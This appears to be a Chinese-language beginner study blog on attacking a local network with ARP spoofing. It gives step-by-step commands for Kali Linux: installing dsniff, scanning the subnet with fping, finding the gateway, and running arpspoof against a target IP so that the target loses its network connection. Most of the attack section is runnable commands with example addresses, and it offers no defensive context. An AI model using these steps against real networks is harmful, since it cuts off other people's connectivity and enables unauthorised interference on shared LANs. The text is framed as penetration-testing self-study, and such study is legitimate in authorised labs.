局域网断网攻击 (arp攻击)

ARP攻击能够实现的技术前提有两个,一是作为攻击者的计算机需要和被攻击者的计算机在一个局域网中,二是作为攻击者的计算机需要知道被攻击者计算机的局域网IP。
环境:安装在VMware Workstation中的Kali Linux,我们需要在VMware的设置中将Kali的联网方式改为“桥接模式”
步骤:

  1. 需要安装arpspoof工具(目前的版本需要自己安装)
    apt-get install dsniff
    完成安装后执行重启
reboot
  1. 查看arpspoof用法
arpspoof -h

会出现具体用法
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

  1. 查看自己的网卡及网关,使用ifconfig命令
    (这里不多介绍,大家应该都会)

  2. 查看局域网当中的ip
    使用fping -g 本机ip/24
    或者fping -asg 本机ip/24
    例如:fping -g 192.168.0.29/24

  3. 实施断网攻击

arpspoof -i eth0 -t 目标ip 网关

例如
arpspoof -i eth0 -t 192.168.0.24 192.168.0.1
如图:
局域网断网攻击 (arp攻击)_第1张图片

  1. 停止Ctrl+C或者Ctrl+Z

注意:kali虚拟机和电脑处于桥接模式,并且处于局域网下。否则会出现
arpspoof: couldn’t arp for host 之类的错误。

很多初学kali的小伙伴和我一样好奇网关怎么获得,虽然一般指默认路由器ip,为了确切的,可以使用kali里面的terminal。
使用root权限打开terminal,不熟悉命令行的话在图形界面也可以搜索到.输入以下命令查看网关ip

route|grep -i default|awk '{print "网关IP: "$2}'

###今日学习结束,明天学习arp欺骗

你可能感兴趣的:(渗透测试入门学习中)